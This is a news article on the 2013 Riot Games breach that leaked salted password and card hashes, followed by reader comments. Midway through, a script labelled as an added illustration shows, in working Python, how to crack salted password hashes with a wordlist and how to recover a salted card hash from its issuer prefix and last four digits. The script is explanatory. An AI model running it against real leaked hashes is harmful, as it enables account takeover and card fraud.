bit-gamer.net

League of Legends breach leaks passwords, credit cards

League of Legends players in the US have been warned that an attack has seen persons unknown obtain salted hashes of passwords and, worryingly, credit card numbers.

League of Legends developer Riot Games has admitted to a security breach which has seen attackers make off with usernames, password hashes and personal details of its North American customers, along with some 120,000 transaction records containing hashed credit card numbers.

League of Legends, released in 2009, quickly became one of the most popular competitive multiplayer games around. Tournaments are often held with prize funds in the thousands of pounds - but some ne'er-do-wells have found an easier way to use the game to get rich: stealing credit card details.

The company has confirmed that attackers have made off with data held on its North American customers including usernames, email addresses, password hashes, and first and last names. More worryingly, around 120,000 transaction records from 2011 were also accessed - including hashed credit card numbers.

'The payment system involved with these records hasn't been used since July of 2011, and this type of payment card information hasn't been collected in any Riot systems since then,' a statement on the matter attributed to Riot's Marc Merrill and Brandon Beck claims. 'We are taking appropriate action to notify and safeguard affected players. We will be contacting these players via the email addresses currently associated with their accounts to alert them.'

The seriousness of the breach is somewhat mitigated by the company's data protection measures: all passwords and credit card numbers held on the system were scrambled using a one-way hash function and further protected using a salt, a random value mixed into each hash before it is stored. Salting means two users with identical passwords end up with two different hashes, so an attacker cannot use precomputed tables or crack every account in a single pass over a wordlist; each hash has to be attacked on its own. It does not, however, make any individual guess more expensive, since the salt is stored alongside the hash and is known to whoever holds the database.

That doesn't mean attacks are impossible, however: accounts protected by common passwords, especially those that can be found in a dictionary, will most likely have had their hashes cracked already. Credit card numbers, meanwhile, are susceptible to brute force despite their length, because they are made up only of digits and most of those digits are predictable. The first six identify the issuer and are drawn from a small set of known prefixes, and the last is a checksum digit computed from the others, which leaves roughly nine unknown digits, or about a billion candidates per hash: a trivial search for a modern graphics card, salt or no salt.
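As an added illustration, not code from the article or from Riot, the following Python script demonstrates both points above: salting gives the same password different hashes under different salts without making a single guess any slower, and a salted hash of a 16-digit card number can be recovered by enumerating the digits that the issuer prefix and the checksum do not already fix. SHA-256 stands in for whatever hash function Riot actually used, which the article does not name; the card number is the well-known Visa test number, the wordlist is constructed here, and all function names are assumptions for the example.

```python
import hashlib
import os
from typing import Iterable, Optional

# SHA-256 is an assumption: the article does not say which hash function Riot used.
def salted_hash(value: str, salt: bytes) -> str:
    """Salted one-way hash of a string, H(salt || value), as hex."""
    return hashlib.sha256(salt + value.encode()).hexdigest()


def same_password_different_hashes(password: str) -> bool:
    """Salting: one password under two random salts yields two unrelated hashes."""
    h1 = salted_hash(password, os.urandom(16))
    h2 = salted_hash(password, os.urandom(16))
    return h1 != h2


def crack_password(target: str, salt: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on one salted hash. The salt sits next to the hash in the
    database, so it is known; it only forces the wordlist to be re-hashed per account."""
    for word in wordlist:
        if salted_hash(word, salt) == target:
            return word
    return None


def luhn_sum(digits: str) -> int:
    """Luhn weighted sum: every second digit from the right is doubled (minus 9 if > 9)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total


def luhn_valid(number: str) -> bool:
    """A card number is valid when its Luhn sum is a multiple of ten."""
    return luhn_sum(number) % 10 == 0


def luhn_check_digit(partial: str) -> str:
    """Check digit that makes partial + digit Luhn-valid."""
    return str((10 - luhn_sum(partial + "0") % 10) % 10)


def candidate_count(last4_known: bool) -> int:
    """Search space for a 16-digit card once the 6-digit issuer prefix (BIN) is known.
    The final digit is a Luhn check digit, so it never contributes a factor of ten."""
    if last4_known:
        return 10 ** 5   # digits 7-11 free, digit 12 forced by Luhn, digits 13-16 known
    return 10 ** 9       # digits 7-15 free, digit 16 forced by Luhn


def crack_card_hash(target: str, salt: bytes, bin6: str, last4: str) -> Optional[str]:
    """Recover a salted hash of a 16-digit card number given its BIN and last four
    digits, both of which are routinely kept in the clear or printed on receipts.
    Only 100,000 hashes are needed; the full 10**9 case differs only in run time."""
    for mid in range(10 ** 5):
        mid5 = f"{mid:05d}"
        # Digit 12 is at index 4 from the right, an undoubled position, so it adds
        # itself to the Luhn sum; pick the value that makes the whole number valid.
        d12 = (-luhn_sum(bin6 + mid5 + "0" + last4)) % 10
        candidate = bin6 + mid5 + str(d12) + last4
        if salted_hash(candidate, salt) == target:
            return candidate
    return None


if __name__ == "__main__":
    salt = os.urandom(16)
    print("same password, different salts, different hashes:",
          same_password_different_hashes("hunter2"))
    wordlist = ["password", "123456", "letmein", "qwerty", "dragon"]  # constructed
    print("dictionary hit:", crack_password(salted_hash("letmein", salt), salt, wordlist))
    card = "4111111111111111"  # the well-known Visa test number, Luhn-valid
    recovered = crack_card_hash(salted_hash(card, salt), salt, card[:6], card[-4:])
    print("recovered card number:", recovered)
    print("candidates with BIN only:", candidate_count(last4_known=False))
```

The card search runs in about a second in pure Python even though it tries every candidate; a cracking rig doing billions of hashes per second makes the BIN-only case just as quick. The only real defence is the one Riot describes, not holding the numbers at all.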

'As a measure to make your accounts safer, within the next 24 hours we’ll require players with accounts in North America to change their passwords to stronger ones that are much harder to guess,' the company's statement adds. 'Additionally, new security features that are currently in development include: email verification: all new registrations and account changes will need to be associated with a valid email address (we’ll also require all existing players to provide a valid email address); two-factor authentication: changes to account email or password will require verification via email or mobile SMS.

'We’re sincerely sorry about this situation,' the company concludes. 'We apologise for the inconvenience and will continue to focus on account security going forward.'

7 Comments

Guinevere 21st August 2013, 10:34
It does beg the question if the payment system hasn't been used since 2011 why did they keep the hashed CC details in the database?
Code:
UPDATE customers_table
SET cc_hash = '<safe>'
WHERE date < '2012-01-01' AND security = 'Security? What security!'
runadumb 21st August 2013, 10:40
At this point hackers' dictionaries are so large and complex that even passwords many believe to be secure get hacked in minutes.

We need a replacement for passwords and we need it yesterday.
WarrenJ 21st August 2013, 10:43
or just have a very strong password.
runadumb 21st August 2013, 11:11
Quote:
Originally Posted by WarrenJ
or just have a very strong password.

Like qeadzcwrsfxv1331? That's a strong password right?
Oh, turns out it isn't http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/

Now we have to use password managers to remember all these individual crazy passwords but that's a single point of failure. That really worries me.
Artanix 21st August 2013, 11:18
Quote:
More worryingly, around 120,000 transaction records from 2011 were also accessed - including hashed credit card numbers.
I thought it was illegal for any merchant to keep transaction details for more than a short period of time?

The record of the transaction itself is kept, but I thought you can't keep any sort of card/personal details on file for too long?
LordPyrinc 21st August 2013, 12:12
Quote:
Originally Posted by runadumb
Like qeadzcwrsfxv1331? That's a strong password right?
Oh, turns out it isn't http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/

Now we have to use password managers to remember all these individual crazy passwords but that's a single point of failure. That really worries me.

Great link. Very enlightening. Scary, but informative.

Requiring users to change their password on a frequent basis would also help to mitigate some of the risk. As is, most sites only require a change once a data breach has happened. By then it could be too late, especially considering how long some companies drag their feet before publicising the breach and notifying their customers.
runadumb 21st August 2013, 12:51
Changing your passwords frequently, in my experience, leads to lower security, as you now not only have to remember dozens (at least) of passwords but also come up with new ones and then remember them.

Bearing in mind each should be at least 12 characters in length, use numbers and a combination of uppercase/lowercase letters spaced out and not just at the beginning or end of a word, and not use names, films or anything else that is now in a hacker's dictionary.

Passwords suck is what I'm saying.